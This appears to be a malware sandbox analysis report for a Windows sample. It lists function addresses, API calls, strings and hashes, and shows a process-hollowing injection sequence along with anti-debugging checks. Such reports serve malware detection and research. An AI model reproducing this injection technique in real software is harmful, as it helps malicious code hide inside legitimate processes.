                                                                                                                                                      • Part of subcall function 0041BA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
                                                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0041B4B3
                                                                                                                                                    • TranslateMessage.USER32(?), ref: 0041B4CD
                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 0041B4D7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                                                                                                                                                    • String ID: %username%$I:\5d2860c89d774.jpg
                                                                                                                                                    • API String ID: 441990211-897913220
                                                                                                                                                    • Opcode ID: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
                                                                                                                                                    • Instruction ID: 53fb4cb99f7e95a824910e08ad4bb0dd21933b0d591bc71827c80b4e91f39c04
                                                                                                                                                    • Opcode Fuzzy Hash: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
                                                                                                                                                    • Instruction Fuzzy Hash: 015188715142449BC718FF61CC929EFB7A8BF54348F40482EF446431A2EF78AA9DCB96
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004516A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: .\crypto\err\err.c$unknown
                                                                                                                                                    • API String ID: 0-565200744
                                                                                                                                                    • Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                                                                                                                                    • Instruction ID: d1206a4052711c5ef0d05e5a1f97d3c0da723a5ab1c334b9285c6dd525f2274c
                                                                                                                                                    • Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                                                                                                                                    • Instruction Fuzzy Hash: 72117C69F8070067F6202B166C87F562A819764B5AF55042FFA482D3C3E2FE54D8829E
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00424168 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 0042419D
                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 00424252
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DebuggerPresent_memset
                                                                                                                                                    • String ID: i;B
                                                                                                                                                    • API String ID: 2328436684-472376889
                                                                                                                                                    • Opcode ID: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                                                                                                                                                    • Instruction ID: b2deef9000060817df5d9888a0c5d5c31052404ed3c7d79a7a675bf972ea9145
                                                                                                                                                    • Opcode Fuzzy Hash: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                                                                                                                                                    • Instruction Fuzzy Hash: 3231D57591122C9BCB21DF69D9887C9B7B8FF08310F5042EAE80CA6251EB349F858F59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0042A77E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042AB93
                                                                                                                                                    • ___raise_securityfailure.LIBCMT ref: 0042AC7A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                    • String ID: 8Q
                                                                                                                                                    • API String ID: 3761405300-2096853525
                                                                                                                                                    • Opcode ID: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                                                                                                                                                    • Instruction ID: cc78ca7643d31f84c049b3cf87471233b0d3094e131d8c276326ba2ae67c1d9c
                                                                                                                                                    • Opcode Fuzzy Hash: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                                                                                                                                                    • Instruction Fuzzy Hash: 4F21FFB5500304DBD750DF56F981A843BE9BB68310F10AA1AE908CB7E0D7F559D8EF45
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00413C40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413CA0
                                                                                                                                                      • Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64
                                                                                                                                                    • _memset.LIBCMT ref: 00413C83
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
                                                                                                                                                    • String ID: vector<T> too long
                                                                                                                                                    • API String ID: 1327501947-3788999226
                                                                                                                                                    • Opcode ID: 7904872b51d802953746902f9a5302fc6c485efb715002b991a685ebf37c2d21
                                                                                                                                                    • Instruction ID: e8ff6f7d1438dbc4cc0d31425bbcf17e71e6c586c3cd126e38002517ea96b8c1
                                                                                                                                                    • Opcode Fuzzy Hash: 7904872b51d802953746902f9a5302fc6c485efb715002b991a685ebf37c2d21
                                                                                                                                                    • Instruction Fuzzy Hash: AB0192B25003105BE3309F1AE801797B7E8AF40765F14842EE99993781F7B9E984C7D9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040C919 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _fputws$CreateDirectory
                                                                                                                                                    • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                                                                    • API String ID: 2590308727-54166481
                                                                                                                                                    • Opcode ID: b861cdce013af4209bc30e04672f112ccf944bab98ef41955443f7e5140c860b
                                                                                                                                                    • Instruction ID: 548e7949761e073c688dfdb6472f733b12cf2ebad02737ba307de427565b7e5f
                                                                                                                                                    • Opcode Fuzzy Hash: b861cdce013af4209bc30e04672f112ccf944bab98ef41955443f7e5140c860b
                                                                                                                                                    • Instruction Fuzzy Hash: 9911E672A00315EBCF20DF65DC8579A77A0AF10318F10063BED5962291E37A99588BCA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00420DB3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    • Assertion failed: %s, file %s, line %d, xrefs: 00420E13
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __calloc_crt
                                                                                                                                                    • String ID: Assertion failed: %s, file %s, line %d
                                                                                                                                                    • API String ID: 3494438863-969893948
                                                                                                                                                    • Opcode ID: ad620ad0ceed5b442731dfb2fa6b5f5738d1ac7595c1b548615a28e3d0ce7eec
                                                                                                                                                    • Instruction ID: 3c5265aa1bf4e9f5ad4874ec33d215fa8746995624eee7e22a7137551c8458fa
                                                                                                                                                    • Opcode Fuzzy Hash: ad620ad0ceed5b442731dfb2fa6b5f5738d1ac7595c1b548615a28e3d0ce7eec
                                                                                                                                                    • Instruction Fuzzy Hash: 75F0A97130A2218BE734DB75BC51B6A27D5AF22724B51082FF100DA5C2E73C88425699
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00480620 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 00480686
                                                                                                                                                      • Part of subcall function 00454C00: _raise.LIBCMT ref: 00454C18
                                                                                                                                                    Strings
                                                                                                                                                    • .\crypto\evp\digest.c, xrefs: 00480638
                                                                                                                                                    • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0048062E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset_raise
                                                                                                                                                    • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                                                                                                                                                    • API String ID: 1484197835-3867593797
                                                                                                                                                    • Opcode ID: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                                                                                                                                                    • Instruction ID: 96aa535d5fc7c596ca855a62b55a20e08de4f59c43588781e3518ec4b5147bd0
                                                                                                                                                    • Opcode Fuzzy Hash: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                                                                                                                                                    • Instruction Fuzzy Hash: 82012C756002109FC311EF09EC42E5AB7E5AFC8304F15446AF6889B352E765EC558B99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0044F23E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 0044F251
                                                                                                                                                      • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0044F266
                                                                                                                                                      • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                                                                                                                                    • String ID: TeM
                                                                                                                                                    • API String ID: 757275642-2215902641
                                                                                                                                                    • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                                                                    • Instruction ID: d1ee5d24d6598838e25116ba354c7cf631fb5eda6106ebacc41b25e9fbee45cd
                                                                                                                                                    • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                                                                    • Instruction Fuzzy Hash: 8FD06774D0020DBBCB04EFA5D59ACCDBBB8AA04348F009567AD1597241EA78A7498B99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:1.1%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                    Total number of Nodes:38
                                                                                                                                                    Total number of Limit Nodes:8
                                                                                                                                                    execution_graph 33297 2230000 33300 2230630 33297->33300 33299 2230005 33301 223064c 33300->33301 33303 2231577 33301->33303 33306 22305b0 33303->33306 33309 22305dc 33306->33309 33307 22305e2 GetFileAttributesA 33307->33309 33308 223061e 33309->33307 33309->33308 33311 2230420 33309->33311 33312 22304f3 33311->33312 33313 22304fa 33312->33313 33314 22304ff CreateWindowExA 33312->33314 33313->33309 33314->33313 33315 2230540 PostMessageA 33314->33315 33316 223055f 33315->33316 33316->33313 33318 2230110 VirtualAlloc GetModuleFileNameA 33316->33318 33319 2230414 33318->33319 33320 223017d CreateProcessA 33318->33320 33319->33316 33320->33319 33322 223025f VirtualFree VirtualAlloc Wow64GetThreadContext 33320->33322 33322->33319 33323 22302a9 ReadProcessMemory 33322->33323 33324 22302e5 VirtualAllocEx NtWriteVirtualMemory 33323->33324 33325 22302d5 NtUnmapViewOfSection 33323->33325 33326 223033b 33324->33326 33325->33324 33327 2230350 NtWriteVirtualMemory 33326->33327 33328 223039d WriteProcessMemory Wow64SetThreadContext ResumeThread 33326->33328 33327->33326 33329 22303fb ExitProcess 33328->33329 33331 2191026 33332 2191035 33331->33332 33335 21917c6 33332->33335 33336 21917e1 33335->33336 33337 21917ea CreateToolhelp32Snapshot 33336->33337 33338 2191806 Module32First 33336->33338 33337->33336 33337->33338 33339 2191815 33338->33339 33341 219103e 33338->33341 33342 2191485 33339->33342 33343 21914b0 33342->33343 33344 21914f9 33343->33344 33345 21914c1 VirtualAlloc 33343->33345 33344->33344 33345->33344

                                                                                                                                                    Executed Functions

                                                                                                                                                    Function 02230110 Relevance: 22.7, APIs: 15, Instructions: 248memorynativethreadCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 02230156
                                                                                                                                                    • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0223016C
                                                                                                                                                    • CreateProcessA.KERNELBASE(?,00000000), ref: 02230255
                                                                                                                                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02230270
                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02230283
                                                                                                                                                    • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 0223029F
                                                                                                                                                    • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 022302C8
                                                                                                                                                    • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 022302E3
                                                                                                                                                    • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 02230304
                                                                                                                                                    • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0223032A
                                                                                                                                                    • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 02230399
                                                                                                                                                    • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 022303BF
                                                                                                                                                    • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 022303E1
                                                                                                                                                    • ResumeThread.KERNELBASE(00000000), ref: 022303ED
                                                                                                                                                    • ExitProcess.KERNEL32(00000000), ref: 02230412
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1259313771.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_2230000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 93872480-0
                                                                                                                                                    • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                                                                    • Instruction ID: 042f9b1f5519f0a29cdff44598482e68cd4ded503f62d28b93d3b5dc57d2bf83
                                                                                                                                                    • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                                                                    • Instruction Fuzzy Hash: DDB1C8B4A00209AFDB44CF98C895F9EBBB5FF88314F248158E509AB395D771AE41CF94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02230420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 15 2230420-22304f8 17 22304fa 15->17 18 22304ff-223053c CreateWindowExA 15->18 19 22305aa-22305ad 17->19 20 2230540-2230558 PostMessageA 18->20 21 223053e 18->21 22 223055f-2230563 20->22 21->19 22->19 23 2230565-2230579 22->23 23->19 25 223057b-2230582 23->25 26 2230584-2230588 25->26 27 22305a8 25->27 26->27 28 223058a-2230591 26->28 27->22 28->27 29 2230593-2230597 call 2230110 28->29 31 223059c-22305a5 29->31 31->27
                                                                                                                                                    APIs
                                                                                                                                                    • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 02230533
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1259313771.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_2230000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateWindow
                                                                                                                                                    • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                                                                                                                    • API String ID: 716092398-2341455598
                                                                                                                                                    • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                                                                    • Instruction ID: d37a774ead6614570d6b84c39d373adf135c78591b99f502d8b920ff24636611
                                                                                                                                                    • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                                                                    • Instruction Fuzzy Hash: 1A511870D083C8DAEB12CBE8C849BDDBFB2AF11708F144058D5447F28AC3BA5659CB66
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 022305B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 32 22305b0-22305d5 33 22305dc-22305e0 32->33 34 22305e2-22305f5 GetFileAttributesA 33->34 35 223061e-2230621 33->35 36 2230613-223061c 34->36 37 22305f7-22305fe 34->37 36->33 37->36 38 2230600-223060b call 2230420 37->38 40 2230610 38->40 40->36
                                                                                                                                                    APIs
                                                                                                                                                    • GetFileAttributesA.KERNELBASE(apfHQ), ref: 022305EC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1259313771.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_2230000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                    • String ID: apfHQ$o
                                                                                                                                                    • API String ID: 3188754299-2999369273
                                                                                                                                                    • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                                                                    • Instruction ID: 2f5e3c6283aee8237482d8ccdc7fd5ff8a87dc116c159cd3de1ad9a84b72d24c
                                                                                                                                                    • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                                                                    • Instruction Fuzzy Hash: 430121B0C0425DEEDF15DBD8C5183AEBFB5AF41308F1480D9C4092B245D7B69B59CBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 021917C6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 41 21917c6-21917df 42 21917e1-21917e3 41->42 43 21917ea-21917f6 CreateToolhelp32Snapshot 42->43 44 21917e5 42->44 45 21917f8-21917fe 43->45 46 2191806-2191813 Module32First 43->46 44->43 45->46 51 2191800-2191804 45->51 47 219181c-2191824 46->47 48 2191815-2191816 call 2191485 46->48 52 219181b 48->52 51->42 51->46 52->47
                                                                                                                                                    APIs
                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 021917EE
                                                                                                                                                    • Module32First.KERNEL32(00000000,00000224), ref: 0219180E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1259211978.0000000002191000.00000040.00000020.00020000.00000000.sdmp, Offset: 02191000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_2191000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3833638111-0
                                                                                                                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                    • Instruction ID: 3cdf5d9cb061181bde8c522bf28598b6bdb934ac5ad0c7bf1940ce809918ecb1
                                                                                                                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                    • Instruction Fuzzy Hash: C2F096362407167FDB203BF5A88DBAE76E8BF49625F100538E64B910C0DB70E8858A61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02191485 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 54 2191485-21914bf call 2191798 57 219150d 54->57 58 21914c1-21914f4 VirtualAlloc call 2191512 54->58 57->57 60 21914f9-219150b 58->60 60->57
                                                                                                                                                    APIs
                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 021914D6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1259211978.0000000002191000.00000040.00000020.00020000.00000000.sdmp, Offset: 02191000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_2191000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                    • Instruction ID: 663e6eff8f7295d4e9a9fe2d4a351dbb3853d82d4b6f28052a3f78a9c941a0cf
                                                                                                                                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                    • Instruction Fuzzy Hash: EE113C79A40208FFDB01DF98C985E99BBF5AF08351F158094F9489B361D371EA90DF80
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    Function 02256437 Relevance: 18.1, APIs: 12, Instructions: 84COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
